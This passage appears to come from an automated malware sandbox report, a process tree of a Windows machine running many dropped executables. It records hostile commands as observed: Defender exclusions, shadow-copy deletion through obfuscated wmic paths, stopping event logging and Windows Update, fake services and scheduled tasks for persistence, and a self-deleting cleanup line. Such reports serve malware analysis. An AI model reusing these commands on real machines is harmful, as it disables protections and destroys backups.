                                                                                                              • C:\Windows\system32\powercfg.exe
                                                                                                                C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                7⤵
                                                                                                                • Power Settings
                                                                                                                PID:2640
                                                                                                              • C:\Windows\system32\powercfg.exe
                                                                                                                C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                7⤵
                                                                                                                • Power Settings
                                                                                                                PID:2336
                                                                                                              • C:\Windows\system32\powercfg.exe
                                                                                                                C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                7⤵
                                                                                                                • Power Settings
                                                                                                                PID:4316
                                                                                                              • C:\Windows\system32\powercfg.exe
                                                                                                                C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                7⤵
                                                                                                                • Power Settings
                                                                                                                PID:2200
                                                                                                              • C:\Windows\system32\dialer.exe
                                                                                                                C:\Windows\system32\dialer.exe
                                                                                                                7⤵
                                                                                                                  PID:1860
                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                  C:\Windows\system32\sc.exe stop eventlog
                                                                                                                  7⤵
                                                                                                                  • Launches sc.exe
                                                                                                                  PID:4388
                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                  C:\Windows\system32\sc.exe start "GeekBrains"
                                                                                                                  7⤵
                                                                                                                  • Launches sc.exe
                                                                                                                  PID:2324
                                                                                                              • C:\Users\Admin\Desktop\a\a\gem1.exe
                                                                                                                "C:\Users\Admin\Desktop\a\a\gem1.exe"
                                                                                                                6⤵
                                                                                                                  PID:3824
                                                                                                                  • C:\Users\Admin\Desktop\a\a\gem1.exe
                                                                                                                    "C:\Users\Admin\Desktop\a\a\gem1.exe"
                                                                                                                    7⤵
                                                                                                                      PID:2296
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3824 -s 504
                                                                                                                      7⤵
                                                                                                                      • Program crash
                                                                                                                      PID:2228
                                                                                                              • C:\Users\Admin\Desktop\a\Fixer.exe
                                                                                                                "C:\Users\Admin\Desktop\a\Fixer.exe"
                                                                                                                4⤵
                                                                                                                  PID:4456
                                                                                                                • C:\Users\Admin\Desktop\a\Client-built.exe
                                                                                                                  "C:\Users\Admin\Desktop\a\Client-built.exe"
                                                                                                                  4⤵
                                                                                                                    PID:2316
                                                                                                                  • C:\Users\Admin\Desktop\a\uu.exe
                                                                                                                    "C:\Users\Admin\Desktop\a\uu.exe"
                                                                                                                    4⤵
                                                                                                                      PID:4116
                                                                                                                    • C:\Users\Admin\Desktop\a\TEST.exe
                                                                                                                      "C:\Users\Admin\Desktop\a\TEST.exe"
                                                                                                                      4⤵
                                                                                                                        PID:3424
                                                                                                                      • C:\Users\Admin\Desktop\a\Crawl.exe
                                                                                                                        "C:\Users\Admin\Desktop\a\Crawl.exe"
                                                                                                                        4⤵
                                                                                                                          PID:3956
                                                                                                                          • \??\c:\Windows\system32\wbem\wmic.exe
                                                                                                                            c:\mnXbyI\mnXb\..\..\Windows\mnXb\mnXb\..\..\system32\mnXb\mnXb\..\..\wbem\mnXb\mnXby\..\..\wmic.exe shadowcopy delete
                                                                                                                            5⤵
                                                                                                                              PID:4420
                                                                                                                            • \??\c:\Windows\system32\wbem\wmic.exe
                                                                                                                              c:\WTOVCi\WTOV\..\..\Windows\WTOV\WTOV\..\..\system32\WTOV\WTOV\..\..\wbem\WTOV\WTOVC\..\..\wmic.exe shadowcopy delete
                                                                                                                              5⤵
                                                                                                                                PID:2676
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\Desktop\a\Crawl.exe"
                                                                                                                                5⤵
                                                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                PID:4464
                                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                  ping 1.1.1.1 -n 1 -w 3000
                                                                                                                                  6⤵
                                                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                  • Runs ping.exe
                                                                                                                                  PID:4324
                                                                                                                            • C:\Users\Admin\Desktop\a\JJSPLOIT.V2.exe
                                                                                                                              "C:\Users\Admin\Desktop\a\JJSPLOIT.V2.exe"
                                                                                                                              4⤵
                                                                                                                                PID:5104
                                                                                                                              • C:\Users\Admin\Desktop\a\albt.exe
                                                                                                                                "C:\Users\Admin\Desktop\a\albt.exe"
                                                                                                                                4⤵
                                                                                                                                  PID:2800
                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2800 -s 720
                                                                                                                                    5⤵
                                                                                                                                    • Program crash
                                                                                                                                    PID:1452
                                                                                                                                • C:\Users\Admin\Desktop\a\drop2.exe
                                                                                                                                  "C:\Users\Admin\Desktop\a\drop2.exe"
                                                                                                                                  4⤵
                                                                                                                                    PID:1744
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell.exe -Command "Add-MpPreference -ExclusionExtension '.exe'; Add-MpPreference -ExclusionProcess 'svchost.exe'"
                                                                                                                                      5⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      PID:2768
                                                                                                                                    • C:\Windows\system32\SCHTASKS.exe
                                                                                                                                      SCHTASKS /CREATE /TN "System-f4855f59e0" /TR "C:\Windows\System32\System-f4855f59e0.exe" /SC ONLOGON /RL HIGHEST /F
                                                                                                                                      5⤵
                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                      PID:4316
                                                                                                                                    • C:\Windows\System32\svchost.exe
                                                                                                                                      C:\Windows\System32\svchost.exe
                                                                                                                                      5⤵
                                                                                                                                        PID:1292
                                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                        "C:\Windows\SysWOW64\explorer.exe"
                                                                                                                                        5⤵
                                                                                                                                          PID:228
                                                                                                                                      • C:\Users\Admin\Desktop\a\drop1.exe
                                                                                                                                        "C:\Users\Admin\Desktop\a\drop1.exe"
                                                                                                                                        4⤵
                                                                                                                                          PID:3248
                                                                                                                                          • C:\Users\Admin\Desktop\a\drop1.exe
                                                                                                                                            "C:\Users\Admin\Desktop\a\drop1.exe"
                                                                                                                                            5⤵
                                                                                                                                              PID:4532
                                                                                                                                          • C:\Users\Admin\Desktop\a\00.exe
                                                                                                                                            "C:\Users\Admin\Desktop\a\00.exe"
                                                                                                                                            4⤵
                                                                                                                                              PID:3604
                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 3604 -s 164
                                                                                                                                                5⤵
                                                                                                                                                • Program crash
                                                                                                                                                PID:4808
                                                                                                                                            • C:\Users\Admin\Desktop\a\64.exe
                                                                                                                                              "C:\Users\Admin\Desktop\a\64.exe"
                                                                                                                                              4⤵
                                                                                                                                                PID:4272
                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /c color 0a
                                                                                                                                                  5⤵
                                                                                                                                                    PID:1604
                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c chcp 936
                                                                                                                                                    5⤵
                                                                                                                                                      PID:3316
                                                                                                                                                      • C:\Windows\system32\chcp.com
                                                                                                                                                        chcp 936
                                                                                                                                                        6⤵
                                                                                                                                                          PID:4496
                                                                                                                                                    • C:\Users\Admin\Desktop\a\Kerish_Doctor_2022.exe
                                                                                                                                                      "C:\Users\Admin\Desktop\a\Kerish_Doctor_2022.exe"
                                                                                                                                                      4⤵
                                                                                                                                                        PID:2640
                                                                                                                                                    • C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                                                                                                                                      3⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                                      PID:336
                                                                                                                                                      • C:\Users\Admin\Desktop\._cache_Synaptics.exe
                                                                                                                                                        "C:\Users\Admin\Desktop\._cache_Synaptics.exe" InjUpdate
                                                                                                                                                        4⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                                        PID:2888
                                                                                                                                                        • C:\Users\Admin\Desktop\a\build.exe
                                                                                                                                                          "C:\Users\Admin\Desktop\a\build.exe"
                                                                                                                                                          5⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                          PID:2760
                                                                                                                                                        • C:\Users\Admin\Desktop\a\gem2.exe
                                                                                                                                                          "C:\Users\Admin\Desktop\a\gem2.exe"
                                                                                                                                                          5⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Drops file in System32 directory
                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                          PID:580
                                                                                                                                                          • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                            6⤵
                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                            PID:1520
                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                            C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                            6⤵
                                                                                                                                                              PID:2056
                                                                                                                                                              • C:\Windows\system32\wusa.exe
                                                                                                                                                                wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                7⤵
                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                PID:2396
                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                              C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                                                              6⤵
                                                                                                                                                              • Launches sc.exe
                                                                                                                                                              PID:2512
                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                              C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                                                              6⤵
                                                                                                                                                              • Launches sc.exe
                                                                                                                                                              PID:2256
                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                              C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                                                              6⤵
                                                                                                                                                              • Launches sc.exe
                                                                                                                                                              PID:2768
                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                              C:\Windows\system32\sc.exe stop bits
                                                                                                                                                              6⤵
                                                                                                                                                              • Launches sc.exe
                                                                                                                                                              PID:1484
                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                              C:\Windows\system32\sc.exe stop dosvc
                                                                                                                                                              6⤵
                                                                                                                                                              • Launches sc.exe
                                                                                                                                                              PID:2320
                                                                                                                                                            • C:\Windows\system32\powercfg.exe
                                                                                                                                                              C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                                              6⤵
                                                                                                                                                              • Power Settings
                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                              PID:1520
                                                                                                                                                            • C:\Windows\system32\powercfg.exe
                                                                                                                                                              C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                                              6⤵
                                                                                                                                                              • Power Settings
                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                              PID:2432
                                                                                                                                                            • C:\Windows\system32\powercfg.exe
                                                                                                                                                              C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                                              6⤵
                                                                                                                                                              • Power Settings
                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                              PID:2736
                                                                                                                                                            • C:\Windows\system32\powercfg.exe
                                                                                                                                                              C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                                              6⤵
                                                                                                                                                              • Power Settings
                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                              PID:2436
                                                                                                                                                            • C:\Windows\system32\dialer.exe
                                                                                                                                                              C:\Windows\system32\dialer.exe
                                                                                                                                                              6⤵
                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                              PID:2760
                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                              C:\Windows\system32\sc.exe delete "GeekBrains"
                                                                                                                                                              6⤵
                                                                                                                                                              • Launches sc.exe
                                                                                                                                                              PID:2060
                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                              C:\Windows\system32\sc.exe create "GeekBrains" binpath= "C:\ProgramData\Screenshots\Lightshot.exe" start= "auto"
                                                                                                                                                              6⤵
                                                                                                                                                              • Launches sc.exe
                                                                                                                                                              PID:4608
                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                              C:\Windows\system32\sc.exe stop eventlog
                                                                                                                                                              6⤵
                                                                                                                                                              • Launches sc.exe
                                                                                                                                                              PID:4716
                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                              C:\Windows\system32\sc.exe start "GeekBrains"
                                                                                                                                                              6⤵
                                                                                                                                                              • Launches sc.exe
                                                                                                                                                              PID:4724
                                                                                                                                                          • C:\Users\Admin\Desktop\a\gem1.exe
                                                                                                                                                            "C:\Users\Admin\Desktop\a\gem1.exe"
                                                                                                                                                            5⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                                                            PID:964
                                                                                                                                                            • C:\Users\Admin\Desktop\a\gem1.exe
                                                                                                                                                              "C:\Users\Admin\Desktop\a\gem1.exe"
                                                                                                                                                              6⤵
                                                                                                                                                              • Checks computer location settings
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Accesses Microsoft Outlook profiles
                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                              • outlook_office_path
                                                                                                                                                              • outlook_win_path
                                                                                                                                                              PID:1476
                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 68
                                                                                                                                                              6⤵
                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                              • Program crash
                                                                                                                                                              PID:292
                                                                                                                                                    • C:\Users\Admin\Desktop\New Text Document mod.exe
                                                                                                                                                      "C:\Users\Admin\Desktop\New Text Document mod.exe"
                                                                                                                                                      2⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                                      PID:2688
                                                                                                                                                      • C:\Users\Admin\Desktop\._cache_New Text Document mod.exe
                                                                                                                                                        "C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"
                                                                                                                                                        3⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                        PID:1376
                                                                                                                                                        • C:\Users\Admin\Desktop\a\Steanings.exe
                                                                                                                                                          "C:\Users\Admin\Desktop\a\Steanings.exe"
                                                                                                                                                          4⤵
                                                                                                                                                            PID:848
                                                                                                                                                          • C:\Users\Admin\Desktop\a\AsyncClientGK.exe
                                                                                                                                                            "C:\Users\Admin\Desktop\a\AsyncClientGK.exe"
                                                                                                                                                            4⤵
                                                                                                                                                              PID:4500
                                                                                                                                                            • C:\Users\Admin\Desktop\a\RuntimeBroker.exe
                                                                                                                                                              "C:\Users\Admin\Desktop\a\RuntimeBroker.exe"
                                                                                                                                                              4⤵
                                                                                                                                                                PID:4464
                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                  "schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\a7\RuntimeBroker.exe" /rl HIGHEST /f
                                                                                                                                                                  5⤵
                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                  PID:4792
                                                                                                                                                                • C:\Windows\system32\a7\RuntimeBroker.exe
                                                                                                                                                                  "C:\Windows\system32\a7\RuntimeBroker.exe"
                                                                                                                                                                  5⤵
                                                                                                                                                                    PID:5044
                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                      "schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\a7\RuntimeBroker.exe" /rl HIGHEST /f
                                                                                                                                                                      6⤵
                                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                      PID:1692
                                                                                                                                                                • C:\Users\Admin\Desktop\a\sela.exe
                                                                                                                                                                  "C:\Users\Admin\Desktop\a\sela.exe"
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:4440
                                                                                                                                                                  • C:\Users\Admin\Desktop\a\01.exe
                                                                                                                                                                    "C:\Users\Admin\Desktop\a\01.exe"
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:2564
                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 164
                                                                                                                                                                        5⤵
                                                                                                                                                                        • Program crash
                                                                                                                                                                        PID:4696
                                                                                                                                                                    • C:\Users\Admin\Desktop\a\wudi.exe
                                                                                                                                                                      "C:\Users\Admin\Desktop\a\wudi.exe"
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:2700
                                                                                                                                                                      • C:\Users\Admin\Desktop\a\02.exe
                                                                                                                                                                        "C:\Users\Admin\Desktop\a\02.exe"
                                                                                                                                                                        4⤵
                                                                                                                                                                          PID:5060
                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5060 -s 164
                                                                                                                                                                            5⤵
                                                                                                                                                                            • Program crash
                                                                                                                                                                            PID:2440
                                                                                                                                                                        • C:\Users\Admin\Desktop\a\32.exe
                                                                                                                                                                          "C:\Users\Admin\Desktop\a\32.exe"
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:4484
                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4484 -s 164
                                                                                                                                                                              5⤵
                                                                                                                                                                              • Program crash
                                                                                                                                                                              PID:3276
                                                                                                                                                                          • C:\Users\Admin\Desktop\a\sdggwsdgdrwgrwgrwgrwgrw.exe
                                                                                                                                                                            "C:\Users\Admin\Desktop\a\sdggwsdgdrwgrwgrwgrwgrw.exe"
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:1000
                                                                                                                                                                            • C:\Users\Admin\Desktop\a\IMG001.exe
                                                                                                                                                                              "C:\Users\Admin\Desktop\a\IMG001.exe"
                                                                                                                                                                              4⤵
                                                                                                                                                                                PID:1592
                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                                                                                                                                            2⤵
                                                                                                                                                                            • Enumerates system info in registry
                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                                                                            PID:1220
                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7feeca09758,0x7feeca09768,0x7feeca09778
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:2356
                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1132 --field-trial-handle=1352,i,9321765255628052971,9412675858174359599,131072 /prefetch:2
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:2764
                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1484 --field-trial-handle=1352,i,9321765255628052971,9412675858174359599,131072 /prefetch:8
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:2912
                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1560 --field-trial-handle=1352,i,9321765255628052971,9412675858174359599,131072 /prefetch:8
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:2352
                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2132 --field-trial-handle=1352,i,9321765255628052971,9412675858174359599,131072 /prefetch:1
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:1000
                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2140 --field-trial-handle=1352,i,9321765255628052971,9412675858174359599,131072 /prefetch:1
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:1860
                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1636 --field-trial-handle=1352,i,9321765255628052971,9412675858174359599,131072 /prefetch:2
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:2576
                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1300 --field-trial-handle=1352,i,9321765255628052971,9412675858174359599,131072 /prefetch:1
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:2324
                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3640 --field-trial-handle=1352,i,9321765255628052971,9412675858174359599,131072 /prefetch:8
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:2416
                                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe
                                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe" --reenable-autoupdates --system-level
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:2000
                                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe
                                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x154,0x158,0x15c,0x128,0x160,0x1401b7688,0x1401b7698,0x1401b76a8
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                      PID:996
                                                                                                                                                                                                • C:\Users\Admin\Desktop\New Text Document mod.exe
                                                                                                                                                                                                  "C:\Users\Admin\Desktop\New Text Document mod.exe"
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                  PID:4864
                                                                                                                                                                                                  • C:\Users\Admin\Desktop\._cache_New Text Document mod.exe
                                                                                                                                                                                                    "C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    PID:4804
                                                                                                                                                                                              • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe "-13615231329579003-1526149884124228934610928853738996558351229226860-609887974"
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:1424
                                                                                                                                                                                                • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe "1615738046-1606828193-2129912555894970050-1284435861427009091-29020478118948094"
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:1036
                                                                                                                                                                                                  • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe "275797550193797091022613937017746046751280886951-1014658247-142314326014244911"
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                      PID:1724
                                                                                                                                                                                                    • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe "-1221721889-1602170389-3829875179791407675744523975230536401953512724-233280201"
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                        PID:2544
                                                                                                                                                                                                      • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe "-1330158933281048875-1005203786-4623793381931359118-1847092987-9427789921358550510"
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:1672
                                                                                                                                                                                                        • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe "-318055271790761412710947219-625585259-105065715034816014-1852919203-1880123818"
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                            PID:2944
                                                                                                                                                                                                          • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe "1441953380-399533389-66235462219635616251348046024-104431395814339770841709149275"
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                              PID:1040
                                                                                                                                                                                                            • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                              \??\C:\Windows\system32\conhost.exe "2232379291328686514-493705153-115949650818862212665362993431700634772731630611"
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:1796
                                                                                                                                                                                                              • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe "100852542021418152481734029808-6127003511353649052-21266898791721612536-1054263583"
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                  PID:4616
                                                                                                                                                                                                                • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe "-162918672-105284188663145880972918909079668323349902320548072396-535991410"
                                                                                                                                                                                                                  1⤵
